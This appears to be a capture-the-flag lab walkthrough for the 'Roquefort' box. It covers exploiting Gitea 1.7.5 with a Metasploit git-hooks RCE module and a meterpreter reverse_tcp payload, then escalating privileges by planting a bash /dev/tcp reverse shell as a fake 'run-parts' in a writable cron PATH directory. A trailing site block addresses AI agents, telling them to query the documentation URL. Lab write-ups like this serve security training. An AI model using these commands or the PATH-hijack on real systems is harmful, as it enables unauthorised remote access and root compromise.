# Roquefort

### Enumeration

```
3000/tcp open   ppp?
```

<https://github.com/go-gitea/gitea/releases/tag/v1.7.5>

Created a user.

`msf6 exploit(multi/http/gitea_git_hooks_rce)`

### Initial Access

```
msf6 exploit(multi/http/gitea_git_hooks_rce) > options 

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password123      yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,t
                                         ype:host:port][...]
   RHOSTS     192.168.246.67   yes       The target host(s), see https://github.co
                                         m/rapid7/metasploit-framework/wiki/Using-
                                         Metasploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connection
                                         s
   SSLCert                     no        Path to a custom SSL certificate (default
                                          is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default
                                         is random)
   USERNAME   test             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.49.246   yes       The listen address (an interface may be speci
                                     fied)
   LPORT  3000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper
```

### PrivEsc

Writable PATH -> `/usr/local/bin`

```
Writable PATH -> /usr/local/bin

chloe@roquefort:/$ cat /etc/crontab
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

Relative path usage in crontab. -> run-parts

Save these contents as run-parts in /usr/local/bin and make it executable

```
#!/bin/bash

0<&196;exec 196<>/dev/tcp/192.168.49.95/21; /bin/bash <&196 >&196 2>&196
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/roquefort.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.